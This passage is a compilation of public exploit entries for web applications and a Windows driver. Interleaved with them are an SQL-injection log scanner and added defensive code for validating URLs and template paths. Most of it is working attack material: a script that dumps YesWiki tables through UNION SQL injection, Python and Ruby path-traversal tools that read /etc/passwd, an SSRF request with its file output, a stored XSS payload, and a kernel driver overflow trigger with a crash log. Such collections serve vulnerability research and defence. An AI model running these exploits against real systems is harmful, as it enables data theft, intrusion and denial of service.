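        reasons = [name for name, rule in SQLI_RULES if rule.search(norm)]
        if float(m["secs"]) >= SLOW_SECONDS:
            reasons.append("slow-response")
        if m["status"] == "500" and "'" in norm:
            reasons.append("quote-triggered-error")
        if reasons:
            findings.append((m["ip"], m["target"], reasons))
    return findings


if __name__ == "__main__":
    for client, target, reasons in scan_log(SAMPLE_LOG):
        print(f"{client}  {', '.join(reasons):32}  {target}")
```

Two of the signals need no payload knowledge at all: a 500 on a request whose parameter contains a lone quote, and a response several seconds slower than the same endpoint's baseline, which is the side effect the sleep() probe above produces by design. Pattern rules catch the noisy UNION probes; the normalisation step is what keeps case changes and inline comments from slipping past them.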
            
# # # # # 
# Vulnerability: SQL Injection
# Date: 18.01.2017
# Vendor Homepage: http://www.scriptgiant.com/
# Script Name: Yoga and Fitness Website Script
# Script Buy Now: http://www.popularclones.com/products/Yoga-and-Fitness-Website
# Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/promo_classes.php?cid=[SQL]
# http://localhost/[PATH]/style.php?s=[SQL]
# http://localhost/[PATH]/teacherindi.php?t=[SQL]
# Etc. Other files also contain SQL injection vulnerabilities.
# # # # #
            
source: https://www.securityfocus.com/bid/55685/info

An attacker can exploit these issues to obtain sensitive information, to upload arbitrary code, and to run it in the context of the web server process.

YingZhiPython 1.9 is vulnerable; other versions may also be affected. 

ftp://www.example.com/../../../../../../../private/etc/passwd 
            
# Title: YetiShare File Hosting Script 5.1.0 - 'url' Server-Side Request Forgery
# Date: 09.01.2021
# Author: Numan Türle
# Vendor Homepage: https://mfscripts.com
# Software Link: https://yetishare.com
# Version: v5.1.0
# Tested on: YetiShare - File Hosting Script v5.1.0, Php Version : 7.4


Summary
---------
YetiShare is a file hosting script. It has a remote file upload feature.
Because sufficient security measures are not taken in the remote file upload
code, an SSRF vulnerability is present.

Description
---------
When a new remote upload request is received from the user, the following
code block is called first.
app/tasks/process_remote_file_downloads.cron.php
------------------------------------------------
        // include plugin code
        $url = $urlDownloadData['url'];
        $params = PluginHelper::includeAppends('url_upload_handler', array(
            'url' => $url,
            'rowId' => 0,
            'urlDownloadData' => $urlDownloadData,
            )
        );
        $url = $params['url'];

        // start download
        $upload_handler->handleRemoteUrlUpload($url);
------------------------------------------------

The url parameter taken from user input in this block is passed to the
"handleRemoteUrlUpload" function.

/Users/numan/Desktop/file-hosting-script-v5.0.0-beta/app/services/Uploader.class.php
------------------------------------------------------------------
public function handleRemoteUrlUpload($url, $rowId = 0) {
        .....
        $remoteFileDetails = $this->getRemoteFileDetails($url);
        $remoteFilesize = (int) $remoteFileDetails['bytes'];
        if ($remoteFilesize > $this->options['max_file_size']) {
            .....ERROR MSG
        }
        else {
            // look for real filename if passed in headers
            if (strlen($remoteFileDetails['real_filename'])) {
                $realFilename = trim(current(explode(';', $remoteFileDetails['real_filename'])));
                if (strlen($realFilename)) {
                    $this->fileUpload->name = $realFilename;
                }
            }

            // try to get the file locally
            $localFile = $this->downloadRemoteFile($url, true);
------------------------------------------------------------------

In this function, the remote file's details are fetched first, and if the byte
count is not larger than max_file_size, the "downloadRemoteFile" function is
called to perform the download.

------------------------------------------------------------------
public function getRemoteFileDetails($url) {
      .....
            $execute = curl_exec($ch);

            // check if any error occured
            if (!curl_errno($ch)) {
                $rs['bytes'] = (int) curl_getinfo($ch, CURLINFO_CONTENT_LENGTH_DOWNLOAD);
.....
------------------------------------------------------------------
------------------------------------------------------------------
public function downloadRemoteFile($url, $streamResponse = false) {
        .....
        // use curl
        if (function_exists('curl_init')) {
            // get file via curl
            $fp = fopen($tmpFullPath, 'w+');
            if ($ch === null) {
                $ch = curl_init();
            }

            curl_setopt($ch, CURLOPT_URL, $url);
            .....
            curl_setopt($ch, CURLOPT_FILE, $fp);
            if (curl_exec($ch) === false) {
                // log error
                LogHelper::error('Failed getting url. Error: ' . curl_error($ch) . ' (' . $url . ')');
                return false;
            }
            $status = curl_getinfo($ch, CURLINFO_HTTP_CODE);
            curl_close($ch);
            fclose($fp);
            .....
        }
.....
------------------------------------------------------------------




POC
---------

GET /ajax/url_upload_handler?csaKey1=CSAKEY1&csaKey2=CSAKEY2&rowId=0&url=file:///etc/passwd&folderId=-1 HTTP/1.1
Host: target.com
Connection: close
Accept: */*
Cookie: HERE_COOKIE



Response
---------
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Connection: close
Pragma: no-cache
Content-Length: XXX

...<script>parent.updateUrlProgress({"done":{"name":"passwd","size":2082,
"type":"text\/plain; charset=us-ascii","error":null,"rowId":0,
"requestUrl":"file:\/\/\/etc\/passwd","url":....



..........
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
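Added example, not YetiShare code: a Python model of the validation that is missing before the url value reaches curl in handleRemoteUrlUpload and downloadRemoteFile above. It allowlists the scheme, resolves the host and rejects any address that is not public, so file:///etc/passwd fails on the scheme and an internal name or the 169.254.169.254 metadata address fails on the destination. The DNS table is constructed so the example runs offline; dns_resolver is the production variant.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# Constructed resolution table so the example runs offline; not real DNS data.
CONSTRUCTED_DNS = {
    "example.com": ["93.184.216.34"],
    "internal.test": ["10.0.0.5"],
    "dual.test": ["93.184.216.34", "127.0.0.1"],  # one public, one loopback record
}


def table_resolver(host: str):
    return CONSTRUCTED_DNS[host]


def dns_resolver(host: str):
    """Real resolver for production use: every address the name maps to."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def is_public_address(addr: str) -> bool:
    ip = ipaddress.ip_address(addr)
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def validate_remote_url(url: str, resolver=dns_resolver):
    """Return (ok, reason).  Rejects non-HTTP schemes (file://, gopher://, ...),
    URLs without a host, and any host that resolves to a non-public address,
    which covers loopback, RFC 1918 ranges and the link-local metadata address.
    Every resolved address must pass, so a name with one internal record fails."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {scheme or '(none)'}"
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        addresses = [str(ipaddress.ip_address(host))]  # literal IP in the URL
    except ValueError:
        try:
            addresses = resolver(host)
        except (KeyError, OSError):
            return False, "host does not resolve"
    if not addresses:
        return False, "host does not resolve"
    for addr in addresses:
        if not is_public_address(addr):
            return False, f"host resolves to non-public address {addr}"
    return True, "ok"


if __name__ == "__main__":
    for candidate in ("file:///etc/passwd", "http://169.254.169.254/latest/meta-data/",
                      "http://internal.test/x", "https://example.com/file.zip"):
        print(candidate, "->", validate_remote_url(candidate, table_resolver))
```

In the PHP code above the same effect at the curl layer comes from restricting CURLOPT_PROTOCOLS and CURLOPT_REDIR_PROTOCOLS to HTTP and HTTPS, so that neither the initial URL nor a redirect can switch to file://, and from pinning the validated address with CURLOPT_RESOLVE so a name that re-resolves between the check and the fetch cannot bypass it.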
            
# Exploit Title: YetiForce CRM < 3.1  - Persistant XSS Vulnerability
# Exploit Author: David Silveiro 
# Exploit Author Github: github.com/davidsilveiro
# Exploit Author Twitter: twitter.com/david_silveiro 
# Vendor Homepage: https://yetiforce.com/
# Software Link: http://sourceforge.net/projects/yetiforce/
# Date: Fixed on 20th June 2016

YetiForce CRM was built on a rock-solid Vtiger foundation, but has hundreds of changes that help to accomplish even the most challenging tasks in the simplest way

YetiForce is vulnerable to a stored XSS vulnerability present within a user's comment section.

POC:

Within 'Companies & Accounts > Accounts' select your preferred user, and then in the 'Comments' section input:

<img src=x onerror=alert('XSS');>

Either refresh the current page, or navigate back to 'Accounts'
            
# Exploit Title: YesWiki cercopitheque 2020.04.18.1 - 'id' SQL Injection
# Date: 2020-04-25
# Exploit Author: coiffeur
# Vendor Homepage: https://yeswiki.net/
# Software Link: https://yeswiki.net/, https://github.com/YesWiki/yeswiki
# Version: YesWiki cercopitheque < 2020-04-18-1

import sys

import requests

DEBUG = 0


def usage():
    banner = """NAME: YesWiki cercopitheque 2020-04-18-1, SQLi
SYNOPSIS: python sqli_2020.04.18.1.py <URL> [OPTIONS]...
DESCRIPTION:
    -lt, list tables.
    -dt <TABLE>, dump table.
AUTHOR: coiffeur
    """
    print(banner)


def parse(text):
    deli_l = 'ABCAABBCC|'
    deli_r = '|ABCAABBCC'
    if (text.find(deli_l) == -1) or (text.find(deli_r) == -1):
        print('[x] Delimiter not found, please try to switch to a Time Based SQLi')
        exit(-1)
    start = text.find(deli_l) + len(deli_l)
    end = start + text[start::].find(deli_r)
    return text[start:end]


def render(elements):
    print(elements)

def get_count(t_type, table_name=None, column_name=None):
    if t_type == 'table':
        payload = '?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,count(TABLE_NAME),0x7c,0x414243414142424343) FROM information_schema.tables),NULL,NULL,NULL,NULL,NULL-- -'
        if DEBUG > 1:
            print(f'[DEBUG] {payload}')
        r = requests.get(url=f'{sys.argv[1]}{payload}')
        if r.status_code == 200:
            data = parse(r.text)
    if t_type == 'column':
        payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,count(COLUMN_NAME),0x7c,0x414243414142424343) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = "{table_name}"),NULL,NULL,NULL,NULL,NULL-- -'
        if DEBUG > 1:
            print(f'[DEBUG] {payload}')
        r = requests.get(url=f'{sys.argv[1]}{payload}')
        data = parse(r.text)
    if t_type == 'element':
        payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,count({column_name}),0x7c,0x414243414142424343) FROM {table_name}),NULL,NULL,NULL,NULL,NULL-- -'
        if DEBUG > 1:
            print(f'[DEBUG] {payload}')
        r = requests.get(url=f'{sys.argv[1]}{payload}')
        data = parse(r.text)
    return int(data)


def list_tables():
    tables_count = get_count(t_type='table')
    print(f'[+] Tables found: {tables_count}')

    tables = []
    for i in range(0, tables_count):
        payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,TABLE_NAME,0x7c,0x414243414142424343) FROM information_schema.tables LIMIT 1 OFFSET {i}),NULL,NULL,NULL,NULL,NULL-- -'
        if DEBUG > 1:
            print(f'[DEBUG] {payload}')
        r = requests.get(url=f'{sys.argv[1]}{payload}')
        if r.status_code == 200:
            table = parse(r.text)
            print(f'\t{table}')
            tables.append(table)
    return tables


def list_columns(table_name):
    columns_count = get_count(t_type='column', table_name=table_name)
    print(f'[+] Columns found: {columns_count}')

    columns = []
    for i in range(0, columns_count):
        payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,COLUMN_NAME,0x7c,0x414243414142424343) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = "{table_name}" LIMIT 1 OFFSET {i}),NULL,NULL,NULL,NULL,NULL-- -'
        if DEBUG > 1:
            print(f'[DEBUG] {payload}')
        r = requests.get(url=f'{sys.argv[1]}{payload}')
        if r.status_code == 200:
            column = parse(r.text)
            if DEBUG > 0:
                print(f'\t{column}')
            columns.append(column)
    return columns


def dump_table(name):
    columns = list_columns(name)
    elements = [None]*len(columns)
    for i in range(0, len(columns)):
        elements_count = get_count(
            t_type='element', table_name=name, column_name=columns[i])
        if DEBUG > 0:
            print(f'[+] Dumping: {columns[i]} ({elements_count} rows)')
        element = []
        for j in range(0, elements_count):
            payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,{columns[i]},0x7c,0x414243414142424343) FROM {name} LIMIT 1 OFFSET {j}),NULL,NULL,NULL,NULL,NULL-- -'
            if DEBUG > 1:
                print(f'[DEBUG] {payload}')
            r = requests.get(url=f'{sys.argv[1]}{payload}')
            if r.status_code == 200:
                element.append(parse(r.text))
                if DEBUG > 0:
                    print(f'\t{element[-1]}')
        elements[i] = element
    render(elements)
    return elements


def main():
    if len(sys.argv) < 3:
        usage()
        exit(-1)

    if sys.argv[2] == '-lt':
        list_tables()

    if sys.argv[2] == '-dt':
        dump_table(sys.argv[3])


if __name__ == "__main__":
    main()
            
# Exploit Title: SQL Injection in Yeswiki (Cercopitheque)
# Date: 02/07/2018
# Exploit Author: Mickael BROUTY (@ark1nar) - FIDENS 
# Vendor Homepage: https://yeswiki.net
# Software Link: https://repository.yeswiki.net/cercopitheque/yeswiki-cercopitheque-2018-12-07-1.zip
# Version: Yeswiki Cercopitheque 2018-06-19-1
# Tested on: Kali linux
# CVE : CVE-2018-13045


# POC:
# 1)
# http://localhost/[PATH]/?BaZar&vue=exporter&id=[SQL]
#


Exploitation example:

http://localhost/[PATH]/?BaZar&vue=exporter&id=-1 UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15#
            
# Exploit Title: YesWiki < 4.5.2 - Unauthenticated Path Traversal
# Exploit Author: Al Baradi Joy
# Exploit Date: April 6, 2025
# CVE ID: CVE-2025-31131
# Vendor Homepage: https://yeswiki.net/
# Software Link: https://github.com/YesWiki/yeswiki
# Affected Version: < 4.5.2
# Tested On: YesWiki 4.5.1 on Ubuntu 22.04
# Vulnerability Type: Unauthenticated Path Traversal (LFI)
# CVSS Score: 8.6 (High)
# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
# Description:
#   YesWiki before version 4.5.2 is vulnerable to unauthenticated path traversal via the 'squelette' parameter.
#   A remote attacker can exploit this issue to read arbitrary files on the server, such as /etc/passwd.

import requests
import sys

def banner():
    print("=" * 80)
    print(" YesWiki < 4.5.2 - Unauthenticated Path Traversal (CVE-2025-31131)")
    print(" Exploit Author: Al Baradi Joy")
    print("=" * 80)

def exploit(target, filename="/etc/passwd"):
    if not target.startswith("http"):
        target = "http://" + target

    traversal = "../" * 8
    encoded_file = filename.replace("/", "%2f")
    payload =
f"/?UrkCEO/edit&theme=margot&squelette={traversal}{encoded_file}&style=margot.css"
    url = target.rstrip("/") + payload

    try:
        print(f"[+] Target: {target}")
        print(f"[+] Attempting to read: (unknown)")
        response = requests.get(url, timeout=10)

        if response.status_code == 200 and "root:" in response.text:
            print("[+] Exploit successful. File contents:\n")
            print(response.text)
        else:
            print("[!] Exploit failed or file not readable.")
            print(f"Status Code: {response.status_code}")
            if len(response.text) < 200:
                print(f"Response:\n{response.text}")
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed: {e}")

if __name__ == "__main__":
    banner()
    if len(sys.argv) < 2:
        print(f"Usage: python3 {sys.argv[0]} <target_url> [file_to_read]")
        print(f"Example: python3 {sys.argv[0]} http://victim.com
/etc/passwd")
        sys.exit(1)

    target_url = sys.argv[1]
    file_to_read = sys.argv[2] if len(sys.argv) > 2 else "/etc/passwd"
    exploit(target_url, file_to_read)
            
# Exploit Title: YESWIKI 0.2 - Path Traversal (template param)
# Date: 2015-11-10
# Exploit Author: HaHwul
# Exploit Author Blog: http://www.codeblack.net
# Vendor Homepage: http://yeswiki.net
# Software Link: https://github.com/YesWiki/yeswiki
# Version: yeswiki 0.2
# Tested on: Debian [Wheezy] , Ubuntu
# CVE : none
# ===========================================
<!-- Open Browser: http://127.0.0.1/vul_test/yeswiki/wakka.php?wiki=HomePage/diaporama&template=/../../../../../../../../../../../../etc/passwd
--><br>
# Exploit Code<br>
# ===========================================
<br><br>

<form name="yeswiki_traversal2_poc" action="http://127.0.0.1/vul_test/yeswiki/wakka.php" method="GET">
<input type="hidden" name="wiki" value="HomePage/diaporama">
Target: Edit HTML Code<br>
File: <input type="text" name="template" value="/../../../../../../../../../../../../etc/passwd"><br>

<input type="submit" value="Exploit">
</form>
<!-- Auto Submit
<script type="text/javascript">document.forms.yeswiki_traversal2_poc.submit();</script>
-->
            
# Exploit Title: YESWIKI 0.2 - Path Traversal
# Date: 2015-09-02
# Exploit Author: HaHwul
# Exploit Author Blog: http://www.codeblack.net
# Vendor Homepage: http://yeswiki.net
# Software Link: https://github.com/YesWiki/yeswiki
# Version: yeswiki 0.2
# Tested on: Debian [Wheezy]
# CVE : none
# ===========================================

#Vulnerability 
#Open Browser: http://[targetURL]//vul_test/yeswiki/wakka.php?wiki=PagesACreer/edit&theme=yeswiki&squelette=/../../../../../../../../../../../../etc/passwd&style=gray.css&bgimg=&newpage=1

require "net/http"
require "uri"

if ARGV.length != 2
  puts "YESWIKI Path Traversal Exploit - File Downloader"
  puts "Usage: ruby yeswiki_traversal.rb [targetURL wakka.php] [File name]"
  puts "  Example : ~~.rb http://127.0.0.1/vul_test/yeswiki/wakka.php /etc/passwd"
  puts "  exploit & code by hahwul[www.codeblack.net]"
else
  puts "YESWIKI Path Traversal Exploit - File Downloader"
  puts "#set Payload..."
  target = ARGV[0]
  downfile = ARGV[1]
  puts " + target : #{target}"
  puts " + DownFile : #{downfile}"
  puts "#Exploit"
  uri = URI.parse("#{target}/vul_test/yeswiki/wakka.php")
  uri.query = URI.encode_www_form({"wiki"=>"PagesACreer/edit","newpage"=>"1","style"=>"gray.css","bgimg"=>"","squelette"=>"/../../../../../../../../../../../../#{downfile}","theme"=>"yeswiki"})
  http = Net::HTTP.new(uri.host, uri.port)
  request = Net::HTTP::Get.new(uri.request_uri)
  response = http.request(request)
  puts "#Response code: " + response.code
  # The included file is echoed before the first HTML tag; if the body has no
  # '<' at all, index returns nil, so fall back to the whole body.
  endNm = response.body.index("<")
  result = endNm ? response.body[0..endNm - 1] : response.body
  puts "#Result: " + result
  puts "#End.."
end
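The three YesWiki entries above (the 'squelette' parameter in CVE-2025-31131 and in the 2015 report, and the 'template' parameter in the diaporama report) are the same defect: a request parameter is joined onto a theme directory and included without checking where the resulting path lands. The following is an added example, not YesWiki project code, of the check a template loader needs: decode the value first (the 2025 PoC encodes the slashes of /etc/passwd as %2f precisely to get past a check that runs on the raw value), then resolve the real path and confirm it is still inside the base directory. The base directory, the `.tpl` suffix and the function names are assumptions for illustration.

```python
import os
from typing import Optional
from urllib.parse import unquote

MAX_DECODE_ROUNDS = 3  # bound repeated percent-decoding (%252f -> %2f -> /)


def fully_decode(value: str) -> str:
    """Percent-decode until the value stops changing, so '%2f' and '%252f'
    are both seen as '/' before any path check runs."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    return value


def resolve_template(base_dir: str, requested: str, suffix: str = ".tpl") -> Optional[str]:
    """Return the absolute path of the requested template if, and only if, it
    resolves inside base_dir; otherwise None. The check runs on the decoded
    value and on the real (symlink-resolved) path, so '..' segments, a leading
    '/', and encoded slashes cannot escape the directory."""
    decoded = fully_decode(requested)
    if not decoded or "\x00" in decoded:
        return None
    # A leading '/' would make os.path.join discard base_dir entirely, so it is
    # stripped; the containment check below is what enforces the boundary.
    candidate = os.path.realpath(os.path.join(base_dir, decoded.lstrip("/") + suffix))
    root = os.path.realpath(base_dir)
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


if __name__ == "__main__":
    base = "/srv/yeswiki/themes"  # assumed install path, for illustration only
    for value in ("margot",
                  "../" * 8 + "%2fetc%2fpasswd",
                  "/../../../../../../../../../../../../etc/passwd"):
        print(f"{value!r:60} -> {resolve_template(base, value)}")
```

The containment test uses `os.path.commonpath` on both real paths rather than a string prefix check, so a sibling directory whose name merely starts with the base name (`themes-old` next to `themes`) is also rejected.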
            
# Exploit Title: Yenkee Hornet Gaming Mouse - 'GM312Fltr.sys' Denial of Service (PoC)
# Date: 2021/04/07		
# Exploit Author: Quadron Research Lab			
# Version: all version		
# Tested on: Windows 10 x64 HUN/ENG Professional
# Vendor: https://www.yenkee.eu/gaming-mouse-hornet-aim/yms-3029
# Reference: https://github.com/Quadron-Research-Lab/Kernel_Driver_bugs/tree/main/GM312Fltr

from ctypes import windll, byref, c_ulong

devicename = "GM312Fltr"

ioctl = 0x22245C

# Other control codes the driver accepts (kept from the original report for reference)
ioctl_list = '''
0x22245C
0x222440
0x222441
0x222400
0x222404
0x222408
0x222420
0x222424
0x222448
0x222450
0x22245c
0x222460
'''

kernel32 = windll.kernel32
# CreateFileA takes an ANSI (bytes) path; 0xC0000000 = GENERIC_READ|GENERIC_WRITE, 0x3 = OPEN_EXISTING
hevDevice = kernel32.CreateFileA(b"\\\\.\\GM312Fltr", 0xC0000000, 0, None, 0x3, 0, None)

if not hevDevice or hevDevice == -1:
    print("Not Win! Sorry!")

else:
    print("OPENED!")

    buf = b'A' * 2000      # oversized input buffer; the driver copies it into a stack buffer
    bufLength = 2000

    kernel32.DeviceIoControl(hevDevice, ioctl, buf, bufLength, None, 0, byref(c_ulong()), None)

[Bugcheck Analysis]
Fatal System Error 0x000000f7
                       (0xBEBEA1CAEAF0A2C1,0x0000F80736BC1742,0xFFFF07F8C943E8BD,0x0000000000000000)

Break instruction exception - code 80000003 (first chance)
nt!DbgBreakPointWithStatus
fffff807`2e1feb90 cc                      int     3
0: kd> !analyze
Connected to Windows 10 19041 x64 target at (Mon Jun 14 20:48:16.370 2021 (UTC + 2:00)), ptr64 TRUE
Loading Kernel Symbols
...............................................................
................................................................
........................

Press ctrl-c (cdb, kd, ntsd) or ctrl-break (windbg) to abort symbol loads that take too long.
Run !sym noisy before .reload to track down problems loading symbols.

........................................
.............................
Loading User Symbols
.............................................
Loading unloaded module list
........

                                                                             
                        Bugcheck Analysis                                    
                                                                             


DRIVER_OVERRAN_STACK_BUFFER (f7)
A driver has overrun a stack-based buffer.  This overrun could potentially
allow a malicious user to gain control of this machine.
DESCRIPTION
A driver overran a stack-based buffer (or local variable) in a way that would
have overwritten the function's return address and jumped back to an arbitrary
address when the function returned.  This is the classic buffer overrun
hacking attack and the system has been brought down to prevent a malicious user
from gaining complete control of it.
Do a kb to get a stack backtrace -- the last routine on the stack before the
buffer overrun handlers and bugcheck call is the one that overran its local
variable(s).
Arguments
Arg1 bebea1caeaf0a2c1, Actual security check cookie from the stack
Arg2 0000f80736bc1742, Expected security check cookie
Arg3 ffff07f8c943e8bd, Complement of the expected security check cookie
Arg4 0000000000000000, zero

Debugging Details
------------------


BUGCHECK_CODE  f7

BUGCHECK_P1 bebea1caeaf0a2c1

BUGCHECK_P2 f80736bc1742

BUGCHECK_P3 ffff07f8c943e8bd

BUGCHECK_P4 0

PROCESS_NAME  pythonw.exe

SYMBOL_NAME  GM312Fltr+e1e

MODULE_NAME GM312Fltr

IMAGE_NAME  GM312Fltr.sys

FAILURE_BUCKET_ID  0xF7_MISSING_GSFRAME_STACKPTR_ERROR_GM312Fltr!unknown_function

FAILURE_ID_HASH  {b8e05604-2a11-789a-ad29-fc4916710f2d}

Followup     MachineOwner
---------

0: kd> kb
RetAddr            Args to Child                                                            Call Site
fffff807`2e312d12  fffff807`344a4ae0 fffff807`2e17d000 00000000`00000000 00000000`00000000  nt!DbgBreakPointWithStatus
fffff807`2e3122f6  00000000`00000003 fffff807`344a4ae0 fffff807`2e20bbc0 00000000`000000f7  nt!KiBugCheckDebugBreak+0x12
fffff807`2e1f6df7  fffff807`344a5210 00000000`00000000 fffff807`36bc18c8 fffff807`344a51a8  nt!KeBugCheck2+0x946
fffff807`36bc0e1e  00000000`000000f7 bebea1ca`eaf0a2c1 0000f807`36bc1742 ffff07f8`c943e8bd  nt!KeBugCheckEx+0x107
fffff807`36bc0ea7  fffff807`344a5210 00000000`00000000 fffff807`344a5748 fffff807`344a5720  GM312Fltr+0xe1e
fffff807`2e1ffbaf  fffff807`36bc0e94 00000000`00000000 00000000`00000000 00000000`00000000  GM312Fltr+0xea7
fffff807`2e087547  fffff807`344a5710 00000000`00000000 ffffe08b`abb1e380 fffff807`36bc0b5d  nt!RtlpExecuteHandlerForException+0xf
fffff807`2e086136  ffffe08b`abb1dcf8 fffff807`344a5e20 ffffe08b`abb1dcf8 ffffe30a`242183c0  nt!RtlDispatchException+0x297
fffff807`2e1f7b82  00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000  nt!KiDispatchException+0x186
fffff807`2e1f7b50  fffff807`2e208da5 00000000`ffffffff fffff807`2e0c3216 00000000`00000010  nt!KxExceptionDispatchOnExceptionStack+0x12
fffff807`2e208da5  00000000`ffffffff fffff807`2e0c3216 00000000`00000010 00000000`00000246  nt!KiExceptionDispatchOnExceptionStackContinue
fffff807`2e204ae0  ffffe30a`1ce27c00 ffffe30a`1ce21010 00000000`00000000 00000000`00000000  nt!KiExceptionDispatch+0x125
fffff807`2e1fe0c7  fffff807`2aab9180 000fa40d`b19b3dfe ffffe30a`27381080 fffff807`2eaea710  nt!KiGeneralProtectionFault+0x320
fffff807`2e1fda76  7fffe30a`29e4bb10 00000000`ffffffff 00000000`00000000 00000000`00000000  nt!SwapContext+0x377
fffff807`2e00c970  ffffe30a`00000006 00000000`ffffffff 00000000`00000000 ffffe30a`24218498  nt!KiSwapContext+0x76
fffff807`2e00be9f  ffffe30a`27381080 fffff807`36b819b6 ffffe08b`abb1e270 00000000`00000000  nt!KiSwapThread+0x500
fffff807`2e00b743  ffffe30a`00000034 00000000`00000000 ffffe30a`23c6d800 ffffe30a`273811c0  nt!KiCommitThreadWait+0x14f
fffff807`36bc0ca2  ffffe08b`abb1e350 fffff807`00000000 00000000`00000000 00000000`00004100  nt!KeWaitForSingleObject+0x233
fffff807`36bc0b5d  ffffffff`ff676980 00000000`00000000 00000000`00000bb8 fffff807`35142017  GM312Fltr+0xca2
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  GM312Fltr+0xb5d
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
41414141`41414141  41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141  0x41414141`41414141
